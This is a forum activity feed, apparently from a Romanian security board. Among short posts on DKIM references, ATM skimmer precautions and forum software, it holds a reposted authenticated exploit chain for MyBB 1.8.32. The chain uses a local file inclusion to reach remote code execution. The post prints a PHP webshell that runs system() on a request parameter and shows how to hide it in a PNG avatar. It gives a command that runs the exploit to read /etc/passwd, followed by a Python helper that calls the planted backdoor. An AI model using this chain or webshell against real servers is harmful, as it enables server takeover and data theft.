RFC 6376: DomainKeys Identified Mail (DKIM) Signatures (rfc-editor.org)
RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC) (rfc-editor.org)
How to create a DKIM record with OpenSSL - Mailhardener knowledge base
Quickstart to DKIM Sign Email with Python – Russell Ballestrini
Frankie Goes To Hollywood - Relax (Official Video) - YouTube

Sursa: https://www.bencteux.fr/posts/dmarc_relax/
  17. MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)

A detailed analysis of MyBB 1.8.32 (code audit + LFI RCE reproduction).

(1) An RCE can be obtained in MyBB's Admin CP under Configuration -> Profile Options -> Avatar Upload Path, by changing the Avatar Upload Path to /inc to bypass the blacklisted upload directory.
(2) After doing that, we are able to chain the "admin avatar upload" page (http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar) with an LFI in the "Edit Language Variables" page (http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english).
(3) These chained bugs can lead to authenticated RCE.

Note: the user must have rights to add or update settings and to update the avatar. This was tested on MyBB 1.8.32.

Exploit usage:

First, choose a PNG file smaller than 1 KB, then merge the PNG file with a simple PHP backdoor using the following commands:

mac@xxx-2 php-backdoor % cat simple-backdoor.php
<?php
if(isset($_REQUEST['cmd'])){
    echo "<getshell success>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "<getshell success>";
    phpinfo();
}
?>
mac@xxx-2 php-backdoor % ls
simple-backdoor.php	test.png
mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png
mac@xxx-2 php-backdoor % file test.png
test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced

Finally, run the exploit script to get RCE output and enjoy the shell:

python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd"

References:
- mybb 1.8.32 RCE in admin panel report
- MyBB
- MyBB github
- Notes from a MyBB code audit (记一次mybb代码审计)
- mybb bugs in exploit database

Sursa: https://github.com/FDlucifer/mybb_1832_LFI_RCE
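Once the backdoored avatar is reachable, pulling command output back is just an HTTP request that extracts whatever sits between the two <getshell success> markers printed by the backdoor shown above. A hedged sketch — the shell URL below is a placeholder assumption, since the real path depends on the chained LFI and the target's setup:

# Sketch: call the planted PHP backdoor and extract output between its success markers.
# SHELL_URL is a hypothetical placeholder; the actual path depends on the LFI chain.
import requests

SHELL_URL = "http://www.mybb1832.cn/inc/avatar_1.php"
MARKER = "<getshell success>"

def run_cmd(cmd: str) -> str:
    body = requests.get(SHELL_URL, params={"cmd": cmd}, timeout=10).text
    start = body.find(MARKER) + len(MARKER)
    end = body.find(MARKER, start)
    return body[start:end]

print(run_cmd("id"))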
  18. Nytro

    Atm

    I agree that there are many methods, including "full frame" ones or even fake ATMs: https://krebsonsecurity.com/2013/12/the-biggest-skimmers-of-all-fake-atms/ I just do the basics of what can be done; in any case I have several accounts that I use, so even if someone does capture the card data, including the PIN, the damage is limited.
  19. I can only recommend IPBoard and advise you to stay away from vBulletin. The IPBoard licence on RST is "standalone", meaning I handle the infrastructure (together with Zatarra) - a dedicated server - and the licence was simply activated from the Admin CP. The price depends on the auxiliary services you choose; you can find the details here: https://invisioncommunity.com/buy/self-hosted/ PS: It's not exactly complicated to install and configure; it requires the usual Linux + PHP/MariaDB/Apache (or similar) knowledge.
  20. No, because the PIN is not stored on the magnetic stripe. However, online payments can still be made. 3D Secure helps partially; it's only useful if the sites they could buy from online (or the payment processors) actually implement 3D Secure as well, which doesn't happen much with the Americans (and their sites).
  21. Nytro

    Atm

    It can steal your card data (depending on the skimmer, it may also capture the PIN). I always tug on the card slot and the keypad, and I hold my wallet above the keypad when entering the PIN in case there's a camera. Important, I think I've said this here before: if you find a skimmer, put it back and leave. Then call the police, the bank or whoever you want. I got this advice from someone at a bank who deals with protecting ATMs against skimmers. The idea was simple: a skimmer rig is very expensive, and the lowlifes who own it are capable of cutting you rather than losing it.
  22. The card data is stored on the magnetic stripe; it is copied with a swipe (passing the card through that strip). In our country I have never in my life used this method, only in the US.
  23. I haven't heard anything bad about them.
  24. It's fairly normal; a lot of junk comes in, quite a few duplicates, the number looks OK.
  25. Oh, nice, I thought the service no longer worked.